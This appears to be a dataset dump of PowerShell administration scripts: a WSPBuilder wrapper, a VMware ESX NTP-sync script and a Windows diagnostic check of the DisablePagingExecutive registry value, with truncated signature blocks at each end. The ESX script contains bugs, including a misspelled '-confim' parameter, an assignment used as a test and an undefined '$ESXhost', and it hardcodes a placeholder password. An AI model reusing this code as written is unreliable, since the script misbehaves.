# FxEGCSqGSIb3DQEHAqCCFwIwghb+AgEDMQ8wDQYJYIZIAWUDBAIBBQAwggFZBgsq
# hkiG9w0BCRABBKCCAUgEggFEMIIBQAIBAQYKKwYBBAGEWQoDATAxMA0GCWCGSAFl
# AwQCAQUABCC/+WKQhEGBV6Ap0lM+xC+2gWDeMVPjLrbX8I0LPoP9PQIGZjOtMlBK
# GBMyMDI0MDUxNjA2NDIxMy44OTVaMASAAgH0oIHYpIHVMIHSMQswCQYDVQQGEwJV
# UzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwGA1UE
# ChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMS0wKwYDVQQLEyRNaWNyb3NvZnQgSXJl
# bGFuZCBPcGVyYXRpb25zIExpbWl0ZWQxJjAkBgNVBAsTHVRoYWxlcyBUU1MgRVNO
# OkQwODItNEJGRC1FRUJBMSUwIwYDVQQDExxNaWNyb3NvZnQgVGltZS1TdGFtcCBT
# ZXJ2aWNloIIReDCCBycwggUPoAMCAQICEzMAAAHcweCMwl9YXo4AAQAAAdwwDQYJ
# KoZIhvcNAQELBQAwfDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIwMTAwHhcNMjMx
# MDEyMTkwNzA2WhcNMjUwMTEwMTkwNzA2WjCB0jELMAkGA1UEBhMCVVMxEzARBgNV
# BAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jv
# c29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxhbmQgT3Bl
# cmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpEMDgyLTRC
# RkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2VydmljZTCC
# AiIwDQYJKoZIhvcNAQEBBQADggIPADCCAgoCggIBAIvIsyA1sjg9kSKJzelrUWF5
# ShqYWL83amn3SE5JyIVPUC7F6qTcLphhHZ9idf21f0RaGrU8EHydF8NxPMR2KVNi
# AtCGPJa8kV1CGvn3beGB2m2ltmqJanG71mAywrkKATYniwKLPQLJ00EkXw5TSwfm
# JXbdgQLFlHyfA5Kg+pUsJXzqumkIvEr0DXPvptAGqkdFLKwo4BTlEgnvzeTfXukz
# X8vQtTALfVJuTUgRU7zoP/RFWt3WagahZ6UloI0FC8XlBQDVDX5JeMEsx7jgJDdE
# nK44Y8gHuEWRDq+SG9Xo0GIOjiuTWD5uv3vlEmIAyR/7rSFvcLnwAqMdqcy/iqQP
# MlDOcd0AbniP8ia1BQEUnfZT3UxyK9rLB/SRiKPyHDlg8oWwXyiv3+bGB6dmdM61
# ur6nUtfDf51lPcKhK4Vo83pOE1/niWlVnEHQV9NJ5/DbUSqW2RqTUa2O2KuvsyRG
# MEgjGJA12/SqrRqlvE2fiN5ZmZVtqSPWaIasx7a0GB+fdTw+geRn6Mo2S6+/bZEw
# S/0IJ5gcKGinNbfyQ1xrvWXPtXzKOfjkh75iRuXourGVPRqkmz5UYz+R5ybMJWj+
# mfcGqz2hXV8iZnCZDBrrnZivnErCMh5Flfg8496pT0phjUTH2GChHIvE4SDSk2hw
# WP/uHB9gEs8p/9Pe/mt9AgMBAAGjggFJMIIBRTAdBgNVHQ4EFgQU6HPSBd0OfEX3
# uNWsdkSraUGe3dswHwYDVR0jBBgwFoAUn6cVXQBeYl2D9OXSZacbUzUZ6XIwXwYD
# VR0fBFgwVjBUoFKgUIZOaHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9j
# cmwvTWljcm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAoMSkuY3JsMGwG
# CCsGAQUFBwEBBGAwXjBcBggrBgEFBQcwAoZQaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNyb3NvZnQlMjBUaW1lLVN0YW1wJTIwUENBJTIw
# MjAxMCgxKS5jcnQwDAYDVR0TAQH/BAIwADAWBgNVHSUBAf8EDDAKBggrBgEFBQcD
# CDAOBgNVHQ8BAf8EBAMCB4AwDQYJKoZIhvcNAQELBQADggIBANnrb8Ewr8eX/H1s
# Kt3rnwTDx4AqgHbkMNQo+kUGwCINXS3y1GUcdqsK/R1g6Tf7tNx1q0NpKk1JTupU
# JfHdExKtkuhHA+82lT7yISp/Y74dqJ03RCT4Q+8ooQXTMzxiewfErVLt8Wefebnc
# ST0i6ypKv87pCYkxM24bbqbM/V+M5VBppCUs7R+cETiz/zEA1AbZL/viXtHmryA0
# CGd+Pt9c+adsYfm7qe5UMnS0f/YJmEEMkEqGXCzyLK+dh+UsFi0d4lkdcE+Zq5JN
# jIHesX1wztGVAtvX0DYDZdN2WZ1kk+hOMblUV/L8n1YWzhP/5XQnYl03AfXErn+1
# Eatylifzd3ChJ1xuGG76YbWgiRXnDvCiwDqvUJevVRY1qy4y4vlVKaShtbdfgPyG
# eeJ/YcSBONOc0DNTWbjMbL50qeIEC0lHSpL2rRYNVu3hsHzG8n5u5CQajPwx9Pzp
# sZIeFTNHyVF6kujI4Vo9NvO/zF8Ot44IMj4M7UX9Za4QwGf5B71x57OjaX53gxT4
# vzoHvEBXF9qCmHRgXBLbRomJfDn60alzv7dpCVQIuQ062nyIZKnsXxzuKFb0TjXW
# w6OFpG1bsjXpOo5DMHkysribxHor4Yz5dZjVyHANyKo0bSrAlVeihcaG5F74SZT8
# FtyHAW6IgLc5w/3D+R1obDhKZ21WMIIHcTCCBVmgAwIBAgITMwAAABXF52ueAptJ
# mQAAAAAAFTANBgkqhkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgT
# Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29m
# dCBDb3Jwb3JhdGlvbjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNh
# dGUgQXV0aG9yaXR5IDIwMTAwHhcNMjEwOTMwMTgyMjI1WhcNMzAwOTMwMTgzMjI1
# WjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDCCAiIwDQYJKoZIhvcNAQEB
# BQADggIPADCCAgoCggIBAOThpkzntHIhC3miy9ckeb0O1YLT/e6cBwfSqWxOdcjK
# NVf2AX9sSuDivbk+F2Az/1xPx2b3lVNxWuJ+Slr+uDZnhUYjDLWNE893MsAQGOhg
# fWpSg0S3po5GawcU88V29YZQ3MFEyHFcUTE3oAo4bo3t1w/YJlN8OWECesSq/XJp
# rx2rrPY2vjUmZNqYO7oaezOtgFt+jBAcnVL+tuhiJdxqD89d9P6OU8/W7IVWTe/d
# vI2k45GPsjksUZzpcGkNyjYtcI4xyDUoveO0hyTD4MmPfrVUj9z6BVWYbWg7mka9
# 7aSueik3rMvrg0XnRm7KMtXAhjBcTyziYrLNueKNiOSWrAFKu75xqRdbZ2De+JKR
# Hh09/SDPc31BmkZ1zcRfNN0Sidb9pSB9fvzZnkXftnIv231fgLrbqn427DZM9itu
# qBJR6L8FA6PRc6ZNN3SUHDSCD/AQ8rdHGO2n6Jl8P0zbr17C89XYcz1DTsEzOUyO
# ArxCaC4Q6oRRRuLRvWoYWmEBc8pnol7XKHYC4jMYctenIPDC+hIK12NvDMk2ZItb
# oKaDIV1fMHSRlJTYuVD5C4lh8zYGNRiER9vcG9H9stQcxWv2XFJRXRLbJbqvUAV6
# bMURHXLvjflSxIUXk8A8FdsaN8cIFRg/eKtFtvUeh17aj54WcmnGrnu3tz5q4i6t
# AgMBAAGjggHdMIIB2TASBgkrBgEEAYI3FQEEBQIDAQABMCMGCSsGAQQBgjcVAgQW
# BBQqp1L+ZMSavoKRPEY1Kc8Q/y8E7jAdBgNVHQ4EFgQUn6cVXQBeYl2D9OXSZacb
# UzUZ6XIwXAYDVR0gBFUwUzBRBgwrBgEEAYI3TIN9AQEwQTA/BggrBgEFBQcCARYz
# aHR0cDovL3d3dy5taWNyb3NvZnQuY29tL3BraW9wcy9Eb2NzL1JlcG9zaXRvcnku
# aHRtMBMGA1UdJQQMMAoGCCsGAQUFBwMIMBkGCSsGAQQBgjcUAgQMHgoAUwB1AGIA
# QwBBMAsGA1UdDwQEAwIBhjAPBgNVHRMBAf8EBTADAQH/MB8GA1UdIwQYMBaAFNX2
# VsuP6KJcYmjRPZSQW9fOmhjEMFYGA1UdHwRPME0wS6BJoEeGRWh0dHA6Ly9jcmwu
# bWljcm9zb2Z0LmNvbS9wa2kvY3JsL3Byb2R1Y3RzL01pY1Jvb0NlckF1dF8yMDEw
# LTA2LTIzLmNybDBaBggrBgEFBQcBAQROMEwwSgYIKwYBBQUHMAKGPmh0dHA6Ly93
# d3cubWljcm9zb2Z0LmNvbS9wa2kvY2VydHMvTWljUm9vQ2VyQXV0XzIwMTAtMDYt
# MjMuY3J0MA0GCSqGSIb3DQEBCwUAA4ICAQCdVX38Kq3hLB9nATEkW+Geckv8qW/q
# XBS2Pk5HZHixBpOXPTEztTnXwnE2P9pkbHzQdTltuw8x5MKP+2zRoZQYIu7pZmc6
# U03dmLq2HnjYNi6cqYJWAAOwBb6J6Gngugnue99qb74py27YP0h1AdkY3m2CDPVt
# I1TkeFN1JFe53Z/zjj3G82jfZfakVqr3lbYoVSfQJL1AoL8ZthISEV09J+BAljis
# 9/kpicO8F7BUhUKz/AyeixmJ5/ALaoHCgRlCGVJ1ijbCHcNhcy4sa3tuPywJeBTp
# kbKpW99Jo3QMvOyRgNI95ko+ZjtPu4b6MhrZlvSP9pEB9s7GdP32THJvEKt1MMU0
# sHrYUP4KWN1APMdUbZ1jdEgssU5HLcEUBHG/ZPkkvnNtyo4JvbMBV0lUZNlz138e
# W0QBjloZkWsNn6Qo3GcZKCS6OEuabvshVGtqRRFHqfG3rsjoiV5PndLQTHa1V1QJ
# sWkBRH58oWFsc/4Ku+xBZj1p/cvBQUl+fpO+y/g75LcVv7TOPqUxUYS8vwLBgqJ7
# Fx0ViY1w/ue10CgaiQuPNtq6TPmb/wrpNPgkNWcr4A245oyZ1uEi6vAnQj0llOZ0
# dFtq0Z4+7X6gMTN9vMvpe784cETRkPHIqzqKOghif9lwY1NNje6CbaUFEMFxBmoQ
# tB1VM1izoXBm8qGCAtQwggI9AgEBMIIBAKGB2KSB1TCB0jELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEtMCsGA1UECxMkTWljcm9zb2Z0IElyZWxh
# bmQgT3BlcmF0aW9ucyBMaW1pdGVkMSYwJAYDVQQLEx1UaGFsZXMgVFNTIEVTTjpE
# MDgyLTRCRkQtRUVCQTElMCMGA1UEAxMcTWljcm9zb2Z0IFRpbWUtU3RhbXAgU2Vy
# dmljZaIjCgEBMAcGBSsOAwIaAxUAHDn/cz+3yRkIUCJfSbL3djnQEqaggYMwgYCk
# fjB8MQswCQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMH
# UmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSYwJAYDVQQD
# Ex1NaWNyb3NvZnQgVGltZS1TdGFtcCBQQ0EgMjAxMDANBgkqhkiG9w0BAQUFAAIF
# AOnv9qkwIhgPMjAyNDA1MTYxMTA2MTdaGA8yMDI0MDUxNzExMDYxN1owdDA6Bgor
# BgEEAYRZCgQBMSwwKjAKAgUA6e/2qQIBADAHAgEAAgIOHDAHAgEAAgISLDAKAgUA
# 6fFIKQIBADA2BgorBgEEAYRZCgQCMSgwJjAMBgorBgEEAYRZCgMCoAowCAIBAAID
# B6EgoQowCAIBAAIDAYagMA0GCSqGSIb3DQEBBQUAA4GBAErLMvBkHb4KezZvNtsk
# 484+j510LWTKQwXtcK8L8YqA0+wlWlY7QubH2hmdTAmD/ECPcxbNI1pTKKJ4hlXU
# U56grdz+Bh5jaW5Z6Xh0chi9pHJ7x1cNFeF0Ldzlvj4DxBkInT30K6T+mEyrcU3r
# 8/mf0Pmg3tX/NXqVmouWStmRMYIEDTCCBAkCAQEwgZMwfDELMAkGA1UEBhMCVVMx
# EzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoT
# FU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt
# U3RhbXAgUENBIDIwMTACEzMAAAHcweCMwl9YXo4AAQAAAdwwDQYJYIZIAWUDBAIB
# BQCgggFKMBoGCSqGSIb3DQEJAzENBgsqhkiG9w0BCRABBDAvBgkqhkiG9w0BCQQx
# IgQg4sQVfmvs+MiGDadhf8rIeeU3yMiB2yxl8WJtZ1OsADswgfoGCyqGSIb3DQEJ
# EAIvMYHqMIHnMIHkMIG9BCBTpxeKatlEP4y8qZzjuWL0Ou0IqxELDhX2TLylxIIN
# NzCBmDCBgKR+MHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQIEwpXYXNoaW5ndG9uMRAw
# DgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24x
# JjAkBgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAyMDEwAhMzAAAB3MHg
# jMJfWF6OAAEAAAHcMCIEIMTvbH6kIHUreuUD/Hq60uvVE0Mtqj5sSIGrAkEVk1NF
# MA0GCSqGSIb3DQEBCwUABIICABFjb8CAUDUk17L1ZLykdgfN8pbmFNKkm8+I2x6v
# 4sh0K+y+46DbpkCFQRflAIWOoA0yPmm6k95D3FJZqkTgNZCYokVZrG4JWg4nRHjx
# uq18oQ89i4HQ7o/RkJ0I4ZhvCo13SpPL51lrjXyLqZViYKZGsSZUSGCGi5c+1a2T
# RF6NeEvPT+HKUqwER3cMnRKvH1CzvWOdoE9f/4LXSztRatSpqqwWSEOJE1TiYMdd
# z/1gpe1vG9k3zTI7nr7BkOPKc5+EiRbEMmLOWw+vIO/VcQrqoy+iS66aERR/7So8
# /rT2DpaILngNGtzn+otIkMLoU9rkigpFQVgGy6PrZDIGsqKxVw5deT8QZj/lRhTH
# 9sy4710sMLLQWdsSaCH1Ws3+/sSzIcWt+PUEEmWK4n2Jv8c3RSwKXTPR5phlz31A
# gBgeOXkq/TCb7yY4NngpmCoU5gIJfNmtsN8NezWSscSoar+TViIBqDaCIFYylECx
# 26Q1WFxvBAfAuKHxlo8tWCCZTrnR2kMk0Og3LlXEh0k/zeVvU+eodEIapky01szg
# MtyVMXGnN0txwNK+Luc2zwxprbcnyjelLIH2RNjX1UX2pzfXmJgd0GvTaOGl4ZRz
# hbO/JU1BY2/RvtRF+UaeMOfne3EET0xH9iZtwDqIRU3ao3JP0Kbx4nHcVkR40xkN
# QK2v
# SIG # End signature block
|
combined_dataset/train/non-malicious/Call WSPBuilder.ps1
|
Call WSPBuilder.ps1
|
function Run-DosCommand($program, [string[]]$programArgs)
{
write-host "Running command: $program";
write-host " Args:"
0..($programArgs.Count-1) | foreach { Write-Host " $($programArgs[$_])" }
& $program $programArgs
}
#Get-FullPath function defined elsewhere, refers to a "base directory" which allows me to make
#all path references RELATIVE to this base directory. Feel free to hardcode the path instead.
$wspbuilder = Get-FullPath("tools\\WSPBuilder.exe")
function Run-WspBuilder($rootDirectory)
{
pushd
cd $rootDirectory
Run-DosCommand -program $WSPBuilder -programArgs @("-BuildWSP",
"true",
"-OutputPath",
(Get-FullPath 'deployment'),
"-ExcludePaths",
(Join-Path -path (Get-FirstDirectoryUnderneathSrc).fullname -childPath "bin\\Debug"))
popd
}
|
combined_dataset/train/non-malicious/ESX host NTP Settings.ps1
|
ESX host NTP Settings.ps1
|
<#======================================================================================
File Name : ESX-NTP.ps1
Original Author : Kenneth C. Mazie
:
Description : This is a VMware PowerCLI script for synchronizing NTP settings across
: all ESX hosts in a Virtual Center instance. It grabs all ESX hosts and
: cycles through them setting the same NTP settings on each. It then
: starts the service and sets it to start automatically.
:
: The individual commands were found on a blog post from Anders Mikkelson.
: I simply combined them into a functioning script so credit goes to him.
: See http://www.amikkelsen.com/?p=458 for the original posting.
:
: Tested on ESXi 5.1 and 5.0
:
: Be sure to edit all sections to suit your needs before executing.
:
: As written the script will prompt for a Virtual Center instance to process
: and a user/password to connect as. It also prompts for the ESX host user ID.
: Hard code these if the prompts become annoying.
:
Notes : Requires VMware PowerShell PowerCLI extentions.
:
Warnings :
:
:
Last Update by : Kenneth C. Mazie (kcmjr AT kcmjr.com to report issues)
Version History : v1.0 - 03-13-12 - Original
Change History : v2.0 - 00-00-00 -
:
=======================================================================================#>
clear-host
$out = Get-PSSnapin | Where-Object {$_.Name -like "vmware.vimautomation.core"};if ($out -eq $null) {Add-PSSnapin vmware.vimautomation.core}
Disconnect-VIServer -confim:$false
$vSphere = read-host "Process Which vSphere Instance?"
$vUser = read-host "vSphere User ID?"
$vPass = ""
$eUser = read-host "ESX User ID?"
$ePass = "password"
$NTPServers = ("time.nist.gov","time-nw.nist.gov","us.pool.ntp.org") #--[ Change these to whatever NTP servers you use ]--
if ($vSphere = $null){break}
Connect-VIServer -Server $vSphere -User $vUser #-Password $vPass
$ESXhosts = get-vmhost
foreach ($ESX in $ESXHosts)
{
Write-Host "Target = $ESX"
Connect-VIServer -Server $ESX -User $eUser #-Password $ePass
$NTPList = Get-VMHostNtpServer -VMHost $ESX
Remove-VMHostNtpServer -VMHost $ESX -NtpServer $NTPList -Confirm:$false
Add-VMHostNtpServer -VMHost $ESX -NtpServer $NTPServers -Confirm:$false
Set-VMHostService -HostService (Get-VMHostservice -VMHost (Get-VMHost $ESXhost) | Where-Object {$_.key -eq "ntpd"}) -Policy "Automatic"
Get-VmhostFirewallException -VMHost $ESX -Name "NTP Client" | Set-VMHostFirewallException -enabled:$true
$ntpd = Get-VMHostService -VMHost $ESX | where {$_.Key -eq 'ntpd'}
Restart-VMHostService $ntpd -Confirm:$false
Disconnect-viserver -server $ESX -confim:$false
}
Write-Host "--- COMPLETED ---"
|
combined_dataset/train/non-malicious/sample_8_93.ps1
|
sample_8_93.ps1
|
#************************************************
# TS_DisablePagingExecutiveCheck.ps1
# Version 1.0.1
# Date: 7/16/2013
# Author: v-maam
# Description: [Idea ID 8012] [Windows] SDP-UDE check for reg key DisablePagingExecutive
# Rule number: a0827633-6742-40cf-be40-e6de772a4e2f
# Rule URL: https://kse.microsoft.com/Contribute/Idea/034ceb38-ffda-4611-abb2-81ca16f231e0
#************************************************
Import-LocalizedData -BindingVariable ScriptStrings
Display-DefaultActivity -Rule -RuleNumber a0827633-6742-40cf-be40-e6de772a4e2f
$RootCauseDetected = $false
$RootCauseName = "RC_DisablePagingExecutiveCheck"
$InformationCollected = new-object PSObject
# **************
# Detection Logic
# **************
$MemoryManagementRegKey = "HKLM:\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management"
if(Test-Path $MemoryManagementRegKey)
{
$DisablePagingExecutiveSetting = (Get-ItemProperty $MemoryManagementRegKey).DisablePagingExecutive
if ($DisablePagingExecutiveSetting -eq 1)
{
$RootCauseDetected = $true
#Add information to InformationCollected
$InformationCollected | add-member -membertype noteproperty -name "Current DisablePagingExecutive Value" -value $DisablePagingExecutiveSetting
$InformationCollected | add-member -membertype noteproperty -name "Expected DisablePagingExecutive Value" -value 0
}
}
# *********************
# Root Cause processing
# *********************
if ($RootCauseDetected)
{
# Red/ Yellow Light
Update-DiagRootCause -id $RootCauseName -Detected $true
Add-GenericMessage -Id $RootCauseName -InformationCollected $InformationCollected
}
else
{
# Green Light
Update-DiagRootCause -id $RootCauseName -Detected $false
}
# SIG # Begin signature block
# MIIoLQYJKoZIhvcNAQcCoIIoHjCCKBoCAQExDzANBglghkgBZQMEAgEFADB5Bgor
# BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG
# KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCCt41HjxWboInxM
# QaBEJ7YHch6GazDEoT+FrK0be8sf+6CCDXYwggX0MIID3KADAgECAhMzAAAEBGx0
# Bv9XKydyAAAAAAQEMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD
# VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p
# bmcgUENBIDIwMTEwHhcNMjQwOTEyMjAxMTE0WhcNMjUwOTExMjAxMTE0WjB0MQsw
# CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u
# ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy
# b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB
# AQC0KDfaY50MDqsEGdlIzDHBd6CqIMRQWW9Af1LHDDTuFjfDsvna0nEuDSYJmNyz
# NB10jpbg0lhvkT1AzfX2TLITSXwS8D+mBzGCWMM/wTpciWBV/pbjSazbzoKvRrNo
# DV/u9omOM2Eawyo5JJJdNkM2d8qzkQ0bRuRd4HarmGunSouyb9NY7egWN5E5lUc3
# a2AROzAdHdYpObpCOdeAY2P5XqtJkk79aROpzw16wCjdSn8qMzCBzR7rvH2WVkvF
# HLIxZQET1yhPb6lRmpgBQNnzidHV2Ocxjc8wNiIDzgbDkmlx54QPfw7RwQi8p1fy
# 4byhBrTjv568x8NGv3gwb0RbAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE
# AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQU8huhNbETDU+ZWllL4DNMPCijEU4w
# RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW
# MBQGA1UEBRMNMjMwMDEyKzUwMjkyMzAfBgNVHSMEGDAWgBRIbmTlUAXTgqoXNzci
# tW2oynUClTBUBgNVHR8ETTBLMEmgR6BFhkNodHRwOi8vd3d3Lm1pY3Jvc29mdC5j
# b20vcGtpb3BzL2NybC9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3JsMGEG
# CCsGAQUFBwEBBFUwUzBRBggrBgEFBQcwAoZFaHR0cDovL3d3dy5taWNyb3NvZnQu
# Y29tL3BraW9wcy9jZXJ0cy9NaWNDb2RTaWdQQ0EyMDExXzIwMTEtMDctMDguY3J0
# MAwGA1UdEwEB/wQCMAAwDQYJKoZIhvcNAQELBQADggIBAIjmD9IpQVvfB1QehvpC
# Ge7QeTQkKQ7j3bmDMjwSqFL4ri6ae9IFTdpywn5smmtSIyKYDn3/nHtaEn0X1NBj
# L5oP0BjAy1sqxD+uy35B+V8wv5GrxhMDJP8l2QjLtH/UglSTIhLqyt8bUAqVfyfp
# h4COMRvwwjTvChtCnUXXACuCXYHWalOoc0OU2oGN+mPJIJJxaNQc1sjBsMbGIWv3
# cmgSHkCEmrMv7yaidpePt6V+yPMik+eXw3IfZ5eNOiNgL1rZzgSJfTnvUqiaEQ0X
# dG1HbkDv9fv6CTq6m4Ty3IzLiwGSXYxRIXTxT4TYs5VxHy2uFjFXWVSL0J2ARTYL
# E4Oyl1wXDF1PX4bxg1yDMfKPHcE1Ijic5lx1KdK1SkaEJdto4hd++05J9Bf9TAmi
# u6EK6C9Oe5vRadroJCK26uCUI4zIjL/qG7mswW+qT0CW0gnR9JHkXCWNbo8ccMk1
# sJatmRoSAifbgzaYbUz8+lv+IXy5GFuAmLnNbGjacB3IMGpa+lbFgih57/fIhamq
# 5VhxgaEmn/UjWyr+cPiAFWuTVIpfsOjbEAww75wURNM1Imp9NJKye1O24EspEHmb
# DmqCUcq7NqkOKIG4PVm3hDDED/WQpzJDkvu4FrIbvyTGVU01vKsg4UfcdiZ0fQ+/
# V0hf8yrtq9CkB8iIuk5bBxuPMIIHejCCBWKgAwIBAgIKYQ6Q0gAAAAAAAzANBgkq
# hkiG9w0BAQsFADCBiDELMAkGA1UEBhMCVVMxEzARBgNVBAgTCldhc2hpbmd0b24x
# EDAOBgNVBAcTB1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlv
# bjEyMDAGA1UEAxMpTWljcm9zb2Z0IFJvb3QgQ2VydGlmaWNhdGUgQXV0aG9yaXR5
# IDIwMTEwHhcNMTEwNzA4MjA1OTA5WhcNMjYwNzA4MjEwOTA5WjB+MQswCQYDVQQG
# EwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9uZDEeMBwG
# A1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMSgwJgYDVQQDEx9NaWNyb3NvZnQg
# Q29kZSBTaWduaW5nIFBDQSAyMDExMIICIjANBgkqhkiG9w0BAQEFAAOCAg8AMIIC
# CgKCAgEAq/D6chAcLq3YbqqCEE00uvK2WCGfQhsqa+laUKq4BjgaBEm6f8MMHt03
# a8YS2AvwOMKZBrDIOdUBFDFC04kNeWSHfpRgJGyvnkmc6Whe0t+bU7IKLMOv2akr
# rnoJr9eWWcpgGgXpZnboMlImEi/nqwhQz7NEt13YxC4Ddato88tt8zpcoRb0Rrrg
# OGSsbmQ1eKagYw8t00CT+OPeBw3VXHmlSSnnDb6gE3e+lD3v++MrWhAfTVYoonpy
# 4BI6t0le2O3tQ5GD2Xuye4Yb2T6xjF3oiU+EGvKhL1nkkDstrjNYxbc+/jLTswM9
# sbKvkjh+0p2ALPVOVpEhNSXDOW5kf1O6nA+tGSOEy/S6A4aN91/w0FK/jJSHvMAh
# dCVfGCi2zCcoOCWYOUo2z3yxkq4cI6epZuxhH2rhKEmdX4jiJV3TIUs+UsS1Vz8k
# A/DRelsv1SPjcF0PUUZ3s/gA4bysAoJf28AVs70b1FVL5zmhD+kjSbwYuER8ReTB
# w3J64HLnJN+/RpnF78IcV9uDjexNSTCnq47f7Fufr/zdsGbiwZeBe+3W7UvnSSmn
# Eyimp31ngOaKYnhfsi+E11ecXL93KCjx7W3DKI8sj0A3T8HhhUSJxAlMxdSlQy90
# lfdu+HggWCwTXWCVmj5PM4TasIgX3p5O9JawvEagbJjS4NaIjAsCAwEAAaOCAe0w
# ggHpMBAGCSsGAQQBgjcVAQQDAgEAMB0GA1UdDgQWBBRIbmTlUAXTgqoXNzcitW2o
# ynUClTAZBgkrBgEEAYI3FAIEDB4KAFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYD
# VR0TAQH/BAUwAwEB/zAfBgNVHSMEGDAWgBRyLToCMZBDuRQFTuHqp8cx0SOJNDBa
# BgNVHR8EUzBRME+gTaBLhklodHRwOi8vY3JsLm1pY3Jvc29mdC5jb20vcGtpL2Ny
# bC9wcm9kdWN0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3JsMF4GCCsG
# AQUFBwEBBFIwUDBOBggrBgEFBQcwAoZCaHR0cDovL3d3dy5taWNyb3NvZnQuY29t
# L3BraS9jZXJ0cy9NaWNSb29DZXJBdXQyMDExXzIwMTFfMDNfMjIuY3J0MIGfBgNV
# HSAEgZcwgZQwgZEGCSsGAQQBgjcuAzCBgzA/BggrBgEFBQcCARYzaHR0cDovL3d3
# dy5taWNyb3NvZnQuY29tL3BraW9wcy9kb2NzL3ByaW1hcnljcHMuaHRtMEAGCCsG
# AQUFBwICMDQeMiAdAEwAZQBnAGEAbABfAHAAbwBsAGkAYwB5AF8AcwB0AGEAdABl
# AG0AZQBuAHQALiAdMA0GCSqGSIb3DQEBCwUAA4ICAQBn8oalmOBUeRou09h0ZyKb
# C5YR4WOSmUKWfdJ5DJDBZV8uLD74w3LRbYP+vj/oCso7v0epo/Np22O/IjWll11l
# hJB9i0ZQVdgMknzSGksc8zxCi1LQsP1r4z4HLimb5j0bpdS1HXeUOeLpZMlEPXh6
# I/MTfaaQdION9MsmAkYqwooQu6SpBQyb7Wj6aC6VoCo/KmtYSWMfCWluWpiW5IP0
# wI/zRive/DvQvTXvbiWu5a8n7dDd8w6vmSiXmE0OPQvyCInWH8MyGOLwxS3OW560
# STkKxgrCxq2u5bLZ2xWIUUVYODJxJxp/sfQn+N4sOiBpmLJZiWhub6e3dMNABQam
# ASooPoI/E01mC8CzTfXhj38cbxV9Rad25UAqZaPDXVJihsMdYzaXht/a8/jyFqGa
# J+HNpZfQ7l1jQeNbB5yHPgZ3BtEGsXUfFL5hYbXw3MYbBL7fQccOKO7eZS/sl/ah
# XJbYANahRr1Z85elCUtIEJmAH9AAKcWxm6U/RXceNcbSoqKfenoi+kiVH6v7RyOA
# 9Z74v2u3S5fi63V4GuzqN5l5GEv/1rMjaHXmr/r8i+sLgOppO6/8MO0ETI7f33Vt
